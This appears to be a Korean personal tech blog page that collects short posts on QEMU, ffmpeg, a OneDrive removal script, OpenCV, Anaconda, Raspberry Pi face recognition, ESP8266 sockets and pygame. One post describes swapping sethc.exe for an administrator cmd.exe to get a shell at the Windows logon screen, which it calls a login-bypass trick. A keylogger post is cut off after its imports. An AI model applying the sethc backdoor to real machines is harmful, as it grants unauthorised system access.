728x90
반응형

# 드라이브 파일(qcow2) 생성

qemu-img create -f qcow2 filename.qcow2 20G 


#qcow2 파일에 이미지 설치

qemu-system-x86_64 -m 4096 -cdrom filename-install.iso -drive file=./filename.qcow2


# qcow2 파일로 부팅

qemu-system-x86_64 -m 4096 -drive file=./filename.qcow2

728x90
반응형

'기타' 카테고리의 다른 글

[GitHub] 시작하기  (0) 2019.10.31
[Shell] OpenSSL 툴로 텍스트 암호화하기  (0) 2019.01.20
ProtonMail : 보안 이메일 (웹사이트)  (0) 2019.01.20
[tip] ffmpeg 파일 변환  (0) 2018.01.16
[tip] OneDrive 완전삭제  (0) 2017.10.16
[tip] Putty 설정 파일  (0) 2017.10.07
728x90
반응형

[mkv -> mp4]

 ffmpeg -i "input.mkv" -codec copy "output.mp4"


[webm -> mp4]

 ffmeg -i "input.webm" -preset ultrafast "output.mp4"


[webm -> mp3]

 ffmpeg -i input.webm -acodec libmp3lame -aq 4 output.mp3


[mp4 -> mp3]
 ffmpeg -i input.mp4 -codec:a libmp3lame -qscale:a 2 output.mp3



[파일 여러개 작업(script)]

 for i in *.mkv; do

     ffmpeg -i "$i" -codec copy "${i%.*}.mp4"

 done


728x90
반응형
728x90
반응형
 

1. bat 파일 스크립트

@echo off
cls

set x86="%SYSTEMROOT%\System32\OneDriveSetup.exe"
set x64="%SYSTEMROOT%\SysWOW64\OneDriveSetup.exe"

echo Closing OneDrive process.
echo.
taskkill /f /im OneDrive.exe > NUL 2>&1
ping 127.0.0.1 -n 5 > NUL 2>&1

echo Uninstalling OneDrive.
echo.
if exist %x64% (
%x64% /uninstall
) else (
%x86% /uninstall
)
ping 127.0.0.1 -n 5 > NUL 2>&1

echo Removing OneDrive leftovers.
echo.
rd "%USERPROFILE%\OneDrive" /Q /S > NUL 2>&1
rd "C:\OneDriveTemp" /Q /S > NUL 2>&1
rd "%LOCALAPPDATA%\Microsoft\OneDrive" /Q /S > NUL 2>&1
rd "%PROGRAMDATA%\Microsoft OneDrive" /Q /S > NUL 2>&1 

echo Removeing OneDrive from the Explorer Side Panel.
echo.
REG DELETE "HKEY_CLASSES_ROOT\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" /f > NUL 2>&1
REG DELETE "HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}" /f > NUL 2>&1

pause

 

[출처]
https://github.com/tomchappelow/onedrive-uninstaller/archive/master.zip (현재 파일 삭제됨)

 

728x90
반응형
728x90
반응형

 

 

 

1. OpenCV 다운로드 받기 [https://opencv.org/releases/]

- C드라이브에 설치해주면 'c:\\opencv' 가 기본 위치가 됨 

 

 

2. 프로젝트에 연결해주기 (프로젝트 클릭 후 Alt+Enter)

 

- VC++ 라이브러리> 포함 디렉터리 (include 폴더 선택), 

- VC++ 라이브러리> 라이브러리 디렉터리 (lib 폴더 선택) 

 

 

- 디버깅 > 환경   :   PATH=C:\opencv\build\x64\vc15\bin;%PATH%

 

 

-링커 > 입력> 추가 종속성   :    C:\opencv\build\x64\vc15\lib\opencv_world430d.lib   

 

 

** 추가 종속성 파일 입력 시 주의사항 : opencv_world430d.lib 파일은 디버그 모드로 컴파일 시 사용, 릴리즈에서 사용을 원하면 opencv_world430.lib 파일 경로 입력, 뒤에 숫자는 라이브러리 버전 별로 다름.

*** 위에 구성과 플랫폼을 변경해서 '디버그/ x86', '디버그/ x64', '릴리즈/x86', '릴리즈/ x64' 다 설정해주면 빌드 시 편함

 

 

 

3. 코드 내 라이브러리 호출

#include <stdio.h>
#include <opencv2/highgui.hpp>
#include <opencv2/opencv.hpp>

using namespace cv;

#pragma comment(lib, "ws2_32.lib")

int main() {
	return 0;
}
728x90
반응형
728x90
반응형

[Anaconda3] 


1. 아나콘다 리눅스 인스톨러(최신버전) 다운로드 (.sh 파일)

 링크 : https://www.anaconda.com/download/#linux


 


2. 설치된 폴더로 이동하여 설치 진행

 

 - 설치 : sudo bash Anaconda3-5.0.0.1-Linux-x86_64.sh

 - 설치시 설명은 ctrl-c, 대답은 전부 yes, 디렉토리는 본인 계정의 홈디렉토리로 해주면됨. ( ex) /home/hwan ) 

 - 홈 디렉토리로 설정 시 본인의 계정에서만 사용가능


3. 설치 확인 (python 실행)

 

 - 빨간색 줄처럼 뜨면 설치 완료

 - 뜨지 않는다면..

   export PYTHON_BIN_PATH = /home/'User Name'/ anaconda3/bin/python '

   명령어를 쳐주면됨. (아니면 개인 프로필 파일에(~/.profile) 직접 주가해줘도 됨)


4. Tensorflow 설치

 - cd ~/anaconda3/bin/ 

   :  설치된 아나콘다 디렉토리의 bin 디렉토리로 이동 (아나콘다 안에 tensorflow 라이브러리를 추가하기 위함)

 - sudo ./pip install tensorflow 

   : 아나콘다가 설치된 디렉토리 내에있는 pip를 사용하여 cpu 버전 텐서플로우를 설치


5. 설치 확인

 - python 실행후 import tensorflow

728x90
반응형
728x90
반응형

1. 파이썬 프로젝트를 만든다


2. python 환경 추가


3. Anaconda 4.2.0 체크 


4. import 하고 실행 -> 에러 안나면 성공



728x90
반응형
728x90
반응형


--------------------------------------------------------------------------------

 OS : Windows 10 64bits

  툴 : Visual Studio 2017 Community + Python, Anaconda3-4.2.0(64bits), TensorFlow (CPU)

--------------------------------------------------------------------------------


[ Visual Studio 2017 Community + Python ]


1. https://www.visualstudio.com/ko/vs/python




2. Community




3.  3개 체크, python 네이티브 개발 도구 선택


 



[ Anaconda3-4.2.0-Windows ]


1. Older version 설치 : https://www.continuum.io/downloads




2.  Anaconda3-4.2.0-Windows-x86_64 설치



3. 아나콘다 설치 : 둘 다 체크


[ Tensor Flow ]


 cmd -> pip install tensorflow





728x90
반응형
728x90
반응형

[위치]

HKEY_CURRENT_USER/Software/Simon Tatham

728x90
반응형

'기타' 카테고리의 다른 글

[tip] QEMU로 ISO설치하고 부팅  (0) 2018.12.08
[tip] ffmpeg 파일 변환  (0) 2018.01.16
[tip] OneDrive 완전삭제  (0) 2017.10.16
[tip] windows7 로그인 화면 캡쳐  (0) 2016.09.18
[tip] windows7 로그인 배경화면 변경 방법  (0) 2016.09.17
[MIPS] Hello World  (0) 2015.10.03
728x90
반응형

1. 목적 및 기능 :

  • 쌓이는 파일들을 정해진 규칙을 기반으로 자동으로 분류하고 중복을 최소화하여 보관 효율을 높임
  • 가중치 알고리즘에 따라 수시로 각 파일의 가중치를 판단하며 해당 가중치가 일정 수치 이상일 경우 삭제 대상으로 이동됨
  • 테이블을 작성하여 파일, 디렉토리 검색 효율을 높임 (SQL 쿼리 적용 가능)
  • 중요한 파일의 경우 자동으로 백업됨

 

2. 정의 : 

  • 가중치 : | 파일 생성일 - 현재 일자 |, 파일 용량, 키워드, 파일 사용 빈도 등을 기반으로 정해짐
  • 중요한 파일 : 특정 키워드 또는 수동 지정 등으로 중요한 파일을 체크함
  • 테이블 : 현재 시스템이 가지고 있는 전체 디렉토리의 구조와 그 내부의 파일들을 상시 최신화하여 파악하며, 해당 데이터를 기반으로 시스템이 파일 및 폴더를 재배치 할 수 있음 (프로그램과 DB 정보 자동 동기화)
  • 정해진 규칙 : 확장자, 파일 사이즈, 파일 명, 키워드 등을 기반으로 정렬 및 분류됨

 

3. 알고리즘 :

  • 특정 경로의 공유 디렉토리에 파일이 발생함
  • 해당 파일을 분석하여 정해진 테이블에 위치시킴
  • 동기화 시 해당 파일이 자동으로 분류되며 공유 디렉토리에서는 사라짐
  • 파일 브라우저, API, 콘솔등의 인터페이스를 기반으로 CRUD 작업이 가능함

 

728x90
반응형
728x90
반응형

1. 라즈비안 OS 다운로드

- 링크 : https://www.raspberrypi.org/downloads/raspbian/

 

 

2. 이미지 기록용 툴 다운로드 (Win32Disklmager or UltraISO)

- 링크 : https://sourceforge.net/projects/win32diskimager/

 

3. 이미지 파일 기록

  1) 이미지 파일 선택

  2) Device 선택 (SD카드)

  3) write

 

 

4. 부팅 후 로그인

  - ID : pi

  - PW : raspberry

 

 

728x90
반응형
728x90
반응형

** TensorFlow 2.0부터는 라이브러리 구조가 변경되어 아래 코드를 바로 사용할 수 없음.

 

1. AI_PI.py

 - 사전에 학습된 가중치 파일과 모델을 라즈베리파이에 설치하여 작동

 - 판단 이후는 GPIO를 통하여 외부 장치(LED) 등으로 결과를 알려줌 (미구현)

# python 3.4
from socket import *
from matplotlib.image import imread
import tensorflow as tf
import numpy as np

# SOCKET
HOST = ''
PORT = 12345
SIZE = 2048
MSGLEN = 0

# NETWORK
learning_rate = 0.001
n_input = 30000
n_classes = 2
dropout = 0.75

x = tf.placeholder(tf.float32, [None, n_input])
y = tf.placeholder(tf.float32, [None, n_classes])
keep_prob = tf.placeholder(tf.float32)

weights ={
    'wc1' : tf.get_variable("wc1", shape=[3, 3, 3, 8], initializer =tf.contrib.layers.xavier_initializer()),
    'wc2' : tf.get_variable("wc2", shape=[3, 3, 8, 16], initializer =tf.contrib.layers.xavier_initializer()),
    'wc3' : tf.get_variable("wc3", shape=[3, 3, 16, 32], initializer =tf.contrib.layers.xavier_initializer()),
    'wc4' : tf.get_variable("wc4", shape=[3, 3, 32, 64], initializer =tf.contrib.layers.xavier_initializer()),
    'wc5' : tf.get_variable("wc5", shape=[3, 3, 64, 128], initializer =tf.contrib.layers.xavier_initializer()),
    'wd1' : tf.get_variable("wd1", shape=[1*1*128, 1024], initializer =tf.contrib.layers.xavier_initializer()),
    'wout' : tf.get_variable("wout", shape=[1024, n_classes], initializer =tf.contrib.layers.xavier_initializer())
    }

biases = {
    'bc1' : tf.Variable(tf.zeros([8])),
    'bc2' : tf.Variable(tf.zeros([16])),
    'bc3' : tf.Variable(tf.zeros([32])),
    'bc4' : tf.Variable(tf.zeros([64])),
    'bc5' : tf.Variable(tf.zeros([128])),
    'bd1' : tf.Variable(tf.zeros([1024])),
    'bout': tf.Variable(tf.zeros([n_classes]))
    }


def conv2d(img, w, b):
    return tf.nn.relu(tf.nn.bias_add(tf.nn.conv2d(img, w, strides=[1, 1, 1, 1], padding='VALID'), b))

def max_pool(img, k):
    return tf.nn.max_pool(img, ksize=[1, k, k, 1], strides=[1, k, k, 1], padding='VALID')


def conv_net(x, weights, biases, dropout):
    _X = tf.reshape(x, shape=[-1, 100, 100, 3])
    
    conv1 = conv2d(_X, weights['wc1'], biases['bc1'])
    conv1 = max_pool(conv1, k=2)
    conv1 = tf.nn.dropout(conv1, dropout)

    conv2 = conv2d(conv1, weights['wc2'], biases['bc2'])
    conv2 = max_pool(conv2, k=2)
    conv2 = tf.nn.dropout(conv2, dropout)

    conv3 = conv2d(conv2, weights['wc3'], biases['bc3'])
    conv3 = max_pool(conv3, k=2)
    conv3 = tf.nn.dropout(conv3, dropout)

    conv4 = conv2d(conv3, weights['wc4'], biases['bc4'])
    conv4 = max_pool(conv4, k=2)
    conv4 = tf.nn.dropout(conv4, dropout)

    conv5 = conv2d(conv4, weights['wc5'], biases['bc5'])
    conv5 = max_pool(conv5, k=2)
    conv5 = tf.nn.dropout(conv5, dropout)

    dense1 = tf.reshape(conv5, [-1, weights['wd1'].get_shape().as_list()[0]])
    dense1 = tf.nn.relu(tf.add(tf.matmul(dense1, weights['wd1']), biases['bd1']))
    dense1 = tf.nn.dropout(dense1, dropout)

    out = tf.add(tf.matmul(dense1, weights['wout']), biases['bout'])

    return out

def autoConnection():
    s_broad = socket(AF_INET, SOCK_DGRAM)
    s_broad.connect(('8.8.8.8', 0))
    priip = s_broad.getsockname()[0]
    s_broad.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    s_broad.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
    
    s_broad.sendto(priip.encode(), ('255.255.255.255', 8000))
    print('ip : ', priip)
    s_broad.close()

def testNetwork():
    print('Start server')
    s = socket(AF_INET, SOCK_STREAM)
    s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
    s.bind((HOST, PORT))
    s.listen(1)
    
    autoConnection()

    s, addr = s.accept()
    print('conneted ... ' , addr)

    # File transfer
    print('File receiving')
    filesize = int(s.recv(4).decode())
    total = 0
    
    f = open('recv.jpg', 'wb')
    while 1:
        data = s.recv(2048)
        if data:
            total += len(data)
            f.write(data)
            if(total == filesize):
                break
    f.close()
    
    # Session run
    print('Start Network')
    img = imread('recv.jpg')
    float_img = img.astype(np.float32)
    float_img *= 1.0/255.0
    float_img = float_img.reshape([1, 100 * 100 * 3])

    pred = conv_net(x, weights, biases, keep_prob)
    cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y))
    optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
    
    correct_pred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
    accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))

    init = tf.global_variables_initializer()
    saver = tf.train.Saver()
    
    with tf.Session() as sess:
        sess.run(init)
        saver.restore(sess, 'tmp/model.ckpt')

        sess.run(optimizer, feed_dict=)
        prd, acc = sess.run([pred, accuracy], feed_dict=)
        
        if acc > 0.9:
            s.send(b'1') # hwan
        else:
            s.send(b'0') # other

    s.close()

testNetwork()

print('exit')
exit()

 

2. AI_PC.py

 - 라즈베리 파이에서 PyCamera가 OpenCV로 인식되지 않아 노트북카메라와 소켓을 활용함

   (차후 수정 시 없어지는 부분)

 - 카메라에 사람 얼굴이 인식되면 캡쳐 후 전송 (Haar Cascade 인식기를 사용)

 - 동일 네트워크 상에 라즈베리파이가 존재하면 자동 연결

# python3.5
import cv2
import numpy as np
from socket import *
import os
import time

# Haar cascade load
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
IMAGE_NAME = 'face.jpg'

# face detection & capture
def face_detect():
    img = cv2.VideoCapture(0)
    while img.isOpened():
        ret, frame = img.read()

        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        faces = face_cascade.detectMultiScale(gray, 1.3, 5)
        if len(faces) > 0:
            print('\nFace Detaction! -> ', end='')
        
            for (x, y, w, h) in faces:
                crop = frame[y:y+h, x:x+h] 
                roi_gray = gray[y:y+h, x:x+h]
        
                eyes = eye_cascade.detectMultiScale(roi_gray)
                if len(eyes) > 0:
                    crop[:, :, 0] = cv2.equalizeHist(crop[:, :, 0])
                    crop[:, :, 1] = cv2.equalizeHist(crop[:, :, 1])
                    crop[:, :, 2] = cv2.equalizeHist(crop[:, :, 2])
                    out_img = cv2.resize(crop, (100, 100), interpolation = cv2.INTER_CUBIC)
                    cv2.imwrite(IMAGE_NAME, out_img)
                    print('Capture!\n')
                    return 1
    return 0

# NETWORK
print('Start Client')
s_broad = socket(AF_INET, SOCK_DGRAM)
s_broad.bind(('', 8000))
msg, addr = s_broad.recvfrom(1024)
HOST = msg.decode()
PORT = 12345
print('Server IP :', HOST)

s = socket(AF_INET, SOCK_STREAM)
print('Server connect ...', end='')
time.sleep(1)
s.connect((HOST, PORT))
print('OK')

while 1:
    if(face_detect()):
    #if(1):
        #IMAGE_NAME = 'tmp_.jpg' # other image 1
        #IMAGE_NAME = 'tmp.jpg' # other image 2

        filesize = os.path.getsize(IMAGE_NAME)
        s.send(str(filesize).encode())

        f = open(IMAGE_NAME, 'rb')
        while 1:
            data = f.read(2048)
            if data:
                s.send(data)
            else:
                break
        f.close()

        while 1:
            result = s.recv(10)
            if(result == b'1'):
                print('\nGood day Master\n')
                exit()
            else:
                print('\nAuthorization Error.\n')
                exit()

s.close()

 

3. 얼굴 이미지 학습 시 사용한 모델 (CNN)

 

728x90
반응형
728x90
반응형

1. 목적

 esp8266을 사용하여 아두이노와 PC가 WiFi, Socket을 사용하여 TCP로 데이터를 주고 받음

 

2. 설명

 1) 만들 것 : 와이파이로 연결된 TCP/IP Client (Python)와 Server (esp8266)

 2) 재료 : esp8266, 아두이노 UNO, FTDI

esp8266
아두이노 UNO
FTDI

 

  3) 회로

    - 펌웨어 업로드 : esp8266의 통신속도를 늦춰주기 위해서 115200 -> 9600 (SoftwareSerial 라이브러리 사용위함)

1. esp의 RX는 FTDI의 TX와 TX는 RX와 연결

2. vcc는 3.3v

3. 펌웨어와 업로드 프로그램은 아래 참고 링크 참조.

 참고 : http://kocoafab.cc/tutorial/view/592

 

- UNO-esp8266 : arduino-esp8266-master 라이브러리 사용

1. 코드 내에서 Rx, Tx 할당한 핀에 연결, (RX-TX, TX-RX로 연결하면됨)

2. vcc는 3.3v

라이브러리 다운 : https://github.com/Diaoul/arduino-ESP8266

참고 : http://m.blog.naver.com/damtaja/220311412393

 

3. 코드

<Client>

# python 버전은 2.7.13
import socket

HOST = '' # esp8266에 접속후 ipconfig 명령을 통해 알아낸 게이트웨이의 주소를 입력하면됨. ex) 192.168.4.1
PORT = 4000 # 정해둔 포트 사용

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP
print 'socket created'

HOST = raw_input("IP: ")

s.connect((HOST, PORT))
print 'connet success'

while 1:
    data = raw_input("data :")
    s.send(data)
    print 'send success'

s.close()

 

<Server>

#include <SoftwareSerial.h>
#include "ESP8266.h"

SoftwareSerial esp8266Serial = SoftwareSerial(10, 11); // 10번 11번을 rx tx로 설정함. (TIMEOUT 뜨면 아두이노에 연결한 rx tx 핀을 바꿔서 껴볼 것)
ESP8266 wifi = ESP8266(esp8266Serial);

void setup()
{
    Serial.begin(9600);

    // ESP8266
    esp8266Serial.begin(9600);
    wifi.begin();
    wifi.setTimeout(1000);

    /******        WiFi commands       ******/
    // setWifiMode
    Serial.print("setWifiMode: ");
    Serial.println(getStatus(wifi.setMode(ESP8266_WIFI_ACCESSPOINT))); // ESP를 AP로 사용

    // setAPConfiguration
    Serial.print("setAPConfiguration: ");
    Serial.println(getStatus(wifi.setAPConfiguration("ESP8266", "awesomelib", 10, ESP8266_ENCRYPTION_WPA_WPA2_PSK))); // SSID 이름, 비밀번호, 채널, 암호화방식 설정
    wifi.restart();

    // getAPConfiguration
    char ssid[32] = {};
    char password[63] = {};
    uint8_t channel;
    ESP8266Encryption encryption;

    wifi.getAPConfiguration(ssid, password, channel, encryption);
    
    Serial.print("getAPConfiguration: ");
    Serial.print(ssid);
    Serial.print(", pw: ");
    Serial.print(password);
    Serial.print(", ch: ");
    Serial.print(channel);
    Serial.print(", encrypt: ");
    Serial.println(encryption);//*/

    // setDHCP
    Serial.print("setDHCP STA: ");
    Serial.println(getStatus(wifi.setDHCP(ESP8266_WIFI_STATION, false)));
    Serial.print("setDHCP AP: ");
    Serial.println(getStatus(wifi.setDHCP(ESP8266_WIFI_ACCESSPOINT, true)));//*/

    // getIP
    IPAddress ip;
    Serial.print("getIP STA: ");
    Serial.print(getStatus(wifi.getIP(ESP8266_WIFI_STATION, ip)));
    Serial.print(" : ");
    Serial.println(ip);
    Serial.print("getIP AP: ");
    Serial.print(getStatus(wifi.getIP(ESP8266_WIFI_ACCESSPOINT, ip)));
    Serial.print(" : ");
    Serial.println(ip);//*/

    /****************************************/
    /******       TCP/IP commands      ******/
    /****************************************/
    // setMultipleConnections
    Serial.print("setMultipleConnections: ");
    Serial.println(getStatus(wifi.setMultipleConnections(true)));

    // createServer
    Serial.print("createServer: ");
    Serial.println(getStatus(wifi.createServer(4000)));
}

int power=0;

void loop()
{
	// Wi-Fi Command
    // getConnectedStations -> esp8266이 AP모드일 때 연결된 장비들 보여줌
    /*
    ESP8266Station stations[5];
    unsigned int stationCount;
    
    Serial.print("getConnectedStations: ");
    Serial.print(getStatus(wifi.getConnectedStations(stations, stationCount, 5)));
    Serial.print(" : ");
    Serial.println(stationCount);
    
    for (uint8_t i = 0; i < stationCount; i++) {
      Serial.print(" - ");
      Serial.print(stations[i].ip);
      Serial.print(" - ");
      for (uint8_t j = 0; j < 6; j++) {
        Serial.print(stations[i].mac[j], HEX);
        if (j < 5)
          Serial.print(":");
      }
      Serial.println();
    }
    delay(1000);
    */

    /****************************************/
    /******       TCP/IP commands      ******/
    /****************************************/
    // getConnectionStatus -> TCP 연결된 기기들 주소 보여줌
    /*
    ESP8266Connection connections[5];
    unsigned int connectionCount;
    
    Serial.print("getConnectionStatus: ");
    Serial.print(getStatus(wifi.getConnectionStatus(connectionStatus, connections, connectionCount)));
    Serial.print(" : ");
    Serial.println(connectionCount);
    
    for (int i = 0; i < connectionCount; i++) {
      Serial.print(" - Connection: ");
      Serial.print(connections[i].id);
      Serial.print(" - ");
      Serial.print(getProtocol(connections[i].protocol));
      Serial.print(" - ");
      Serial.print(connections[i].ip);
      Serial.print(":");
      Serial.print(connections[i].port);
      Serial.print(" - ");
      Serial.println(getRole(connections[i].role));
    }
    
    delay(5000);
    
    // 데이터 읽어옴
    unsigned int id;
    int length;
    int totalRead;
    char buffer[11] = {};

    if ((length = wifi.available()) > 0) {
      id = wifi.getId();
      totalRead = wifi.read(buffer, 10);

      if (length > 0) {
        Serial.print("Received ");
        Serial.print(totalRead);
        Serial.print("/");
        Serial.print(length);
        Serial.print(" bytes from client ");
        Serial.print(id);
        Serial.print(": ");
        Serial.println((char*)buffer);
      }
    }*/
}

String getStatus(bool status)
{
    if (status)
        return "OK";

    return "KO";
}

String getStatus(ESP8266CommandStatus status)
{
    switch (status) {
    case ESP8266_COMMAND_INVALID:
        return "INVALID";

    case ESP8266_COMMAND_TIMEOUT:
        return "TIMEOUT";

    case ESP8266_COMMAND_OK:
        return "OK";

    case ESP8266_COMMAND_NO_CHANGE:
        return "NO CHANGE";

    case ESP8266_COMMAND_ERROR:
        return "ERROR";

    case ESP8266_COMMAND_NO_LINK:
        return "NO LINK";

    case ESP8266_COMMAND_TOO_LONG:
        return "TOO LONG";

    case ESP8266_COMMAND_FAIL:
        return "FAIL";

    default:
        return "UNKNOWN COMMAND STATUS";
    }
}

String getRole(ESP8266Role role)
{
    switch (role) {
    case ESP8266_ROLE_CLIENT:
        return "CLIENT";

    case ESP8266_ROLE_SERVER:
        return "SERVER";

    default:
        return "UNKNOWN ROLE";
    }
}

String getProtocol(ESP8266Protocol protocol)
{
    switch (protocol) {
    case ESP8266_PROTOCOL_TCP:
        return "TCP";

    case ESP8266_PROTOCOL_UDP:
        return "UDP";

    default:
        return "UNKNOWN PROTOCOL";
    }
}

 

 cf. 라이브러리 기본 샘플 코드를 그대로 사용함, 라이브러리는 내부적으로 AT 커맨드를 사용함.

728x90
반응형
728x90
반응형
<script>
//추가 단축키
var key = new Array();
key['w'] = "/admin/entry/post/";
key['e'] = "/admin/skin/edit/";
key['r'] = "/admin/plugin/refererUrlLog/";
key['h'] = "/";
key['m'] = "/admin/center/";
    
function getKey(keyStroke) {
    if ((event.srcElement.tagName != 'INPUT') && (event.srcElement.tagName != 'TEXTAREA')){
        isNetscape=(document.layers);
        eventChooser = (isNetscape) ? keyStroke.which : event.keyCode;
        which = String.fromCharCode(eventChooser).toLowerCase();
        for (var i in key)
            if (which == i) window.location = key[i];
    }
}
document.onkeypress = getKey;
</script>

 

- 위의 스크립트를 'TISTORY 관리 페이지 - HTML/CSS 편집 - HTML'에 추가

- 블로그의 메인 페이지에서 추가해둔 키를 누르면 해당 페이지로 이동할 수 있음

   ex) 'w'키 입력시 글쓰기 페이지로 이동

728x90
반응형
728x90
반응형

1. 개요
 
- 돌림판에 사용될 원 그리기


2. 코드

# -*- coding: utf-8 -*-
import sys
import pygame
import math
from pygame.locals import *

PI = 3.14159265359
R = 200
screenX = 410 
screenY = 410
Ox = screenX / 2
Oy = screenY / 2

# 초당 프레임수를 정의
TARGET_FPS = 30
clock = pygame.time.Clock()

# 색 정의
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
WHITE = (255, 255, 255)

# 실수를 더하기 위해서 만들어줌
def myrange(start, end, step):
    r = start
    while(r<end):
        yield r
        r += step

# 인원 수 를 입력받아서 같은 각도로 나눠줌
def auto_line(size):
  a = 360.0 / size # 1명 각도
  # cnt = 0
  tmp = 0 # 각도 누적
  x = 0.0
  y = 0.0
  
  for tmp in myrange(0, 360, a):
      # cnt = cnt + 1

      # 간단한 수학 공식으로 좌표 Get
      x = R * math.cos(math.radians(tmp))
      y = R * math.sin(math.radians(tmp))
      
      #print "[%d] tmp : %.2lf, x : %lf, y : %lf" %(cnt, tmp, x, y)
      pygame.draw.line(screen, BLACK, (Ox, Oy), (Ox+x, Oy+y), 2)


# 라이브러리 및 디스플레이 초기화
pygame.init()

num = raw_input("num : ")
screen = pygame.display.set_mode((screenX, screenY), DOUBLEBUF)
pygame.display.set_caption('Hello World!')  # 타이틀바의 텍스트를 설정

screen.fill(WHITE)
#pygame.draw.line(screen, RED, (Ox, Oy-R*10), (Ox, Oy+R*10), 1) # y
#pygame.draw.line(screen, RED, (Ox-R*10, Oy), (Ox+R*10, Oy), 1) # x

# 메인 루프
while True:
  for event in pygame.event.get():
    # 이벤트를 처리하는 부분
    if event.type == QUIT:
      pygame.quit()
      sys.exit()

  auto_line(int(num)) # 입력받은 인원 수로 원을 나눠줌
  pygame.draw.circle(screen, BLACK, (Ox, Oy), R, 2) # 외부 원
  pygame.draw.circle(screen, BLACK, (Ox, Oy), 20) # 중심 원
  pygame.display.flip()  # 화면 전체를 업데이트
  clock.tick(TARGET_FPS)  # 프레임 수 맞추기

 

생성된 돌림판 이미지 - Alt+Prtsc 으로 캡쳐 후 사용

 

 

728x90
반응형

'프로그래밍 > Python' 카테고리의 다른 글

[Python] FinanceDataReader 모듈  (0) 2021.07.31
[Python] pykrx 모듈  (0) 2021.05.27
[Python] yfinance 모듈  (0) 2021.05.27
[Python] pycryptodome 모듈  (0) 2020.09.26
[Python] 돌림판  (0) 2016.10.03
[Python] 키로거 + 스크린샷  (0) 2016.09.18
728x90
반응형

1. 개요

 - pygame 라이브러리를 사용하여 윈도우를 그림

 - 스페이스 바로 돌림판의 회전과 정지를 정함

 - 정지 시 천천히 멈춤 (회전각을 0까지 빼줌)

 

2. 코드

 
#-*- coding: utf-8 -*-
import sys
import pygame
from pygame.locals import *
import time

# 초당 프레임수를 정의
TARGET_FPS = 30
clock = pygame.time.Clock()

# 색 정의
BLACK = (0, 0, 0)
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
WHITE = (255, 255, 255)

# 라이브러리 및 디스플레이 초기화
pygame.init()
screen = pygame.display.set_mode((600, 400), DOUBLEBUF) # 윈도우 크기 및 속성 설정
pygame.display.set_caption('돌림판')  # 타이틀바의 텍스트를 설정

# 이미지 파일을 로딩
img = pygame.image.load('images.png') # 돌림판 이미지
img2 = pygame.image.load('images2.jpg') # 화살표

degree = 0
flag = True 
rad = 100
stop_time = 3 # 돌림판이 멈출 때까지의 시간 (클수록 빨리 멈춤)

# 메인 루프
while True:
  for event in pygame.event.get():
    # 이벤트를 처리하는 부분
    if event.type == QUIT:
      pygame.quit()
      sys.exit()

    # 키보드 이벤트 처리
    if event.type == KEYDOWN:
      # 스페이스 -> 토글
      if event.key == 32:
          if flag == True:
              flag = False
          elif flag == False:
              flag = True
              rad = 100

  # 게임의 상태를 화면에 그려주는 부분
  screen.fill(WHITE)
  
  # 이미지 파일 회전하여 그리기
  x = 350
  y = 200
  
  rotated = pygame.transform.rotate(img, degree) # degree 만큼 회전
  rect = rotated.get_rect()
  rect.center = (x, y)
  screen.blit(rotated, rect)

  # 플래그의 상태가 True면 회전, False면 천천히 정지
  if flag == True:
      degree += rad
  elif flag == False:
      if rad > 0:
          rad -= stop_time
          degree += rad
          

  screen.blit(img2, (70, 180)) # 화살표 그리기
  pygame.display.flip()  # 화면 전체를 업데이트
  clock.tick(TARGET_FPS)  # 프레임 수 맞추기

 

3. 결과

 

 

728x90
반응형

'프로그래밍 > Python' 카테고리의 다른 글

[Python] FinanceDataReader 모듈  (0) 2021.07.31
[Python] pykrx 모듈  (0) 2021.05.27
[Python] yfinance 모듈  (0) 2021.05.27
[Python] pycryptodome 모듈  (0) 2020.09.26
[Python] 원 나누기  (0) 2016.10.03
[Python] 키로거 + 스크린샷  (0) 2016.09.18
728x90
반응형

[문제점]

 - 사용자 로그인 화면(windows 로그온) 에서는 PrtSc 키를 이용해 화면을 캡쳐할 수 없음.


[해결]

 - 사용자 로그인을 우회 할 때 사용하는 방법을 응용해봄

      1. 로그인 화면에서 Shift 키를 5회 연속 누르면 고정키와 관련된 프로그램이 실행됨 (sethc.exe)

      2. sethc.exe는 c:\windows\System32 폴더에 존재

      3. 상용 캡쳐 프로그램(반*캠 등)을 사용해도 되지만, 여기서는 만들어둔 파이썬 프로그램이 있으므로 cmd.exe를 sethc.exe와 교체해줌

          cf. cmd 속성에서 관리자 권한으로 실행 옵션을 체크해둬야함.

      4. 로그인 화면에서 Shift를 5회 연속 입력하면 cmd실행

      5. 화면 캡쳐 프로그램을 실행 시켜 이미지 파일로 저장


[결과]

728x90
반응형

'기타' 카테고리의 다른 글

[tip] ffmpeg 파일 변환  (0) 2018.01.16
[tip] OneDrive 완전삭제  (0) 2017.10.16
[tip] Putty 설정 파일  (0) 2017.10.07
[tip] windows7 로그인 배경화면 변경 방법  (0) 2016.09.17
[MIPS] Hello World  (0) 2015.10.03
[MIPS] PCSpim  (0) 2015.10.03
728x90
반응형

1. 개요

 - 현재 포커스를 가지고 있는 프로세스를 파악

 - 키 다운 이벤트 발생한 버튼이 프린트스크린이면 전체 화면을 캡쳐한 후 파일로 저장

 

2. 코드
from ctypes import *
import pythoncom
import pyHook
import win32clipboard
import win32gui
import win32ui
import win32con
import win32api

user32 = windll.user32
kernel32 = windll.kernel32
psapi = windll.psapi

current_window = None

def screenshot(): # win32API를 사용해서 전체 화면의 스크린샷을 파일로 만들어줌
    hdesktop = win32gui.GetDesktopWindow()

    width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN)
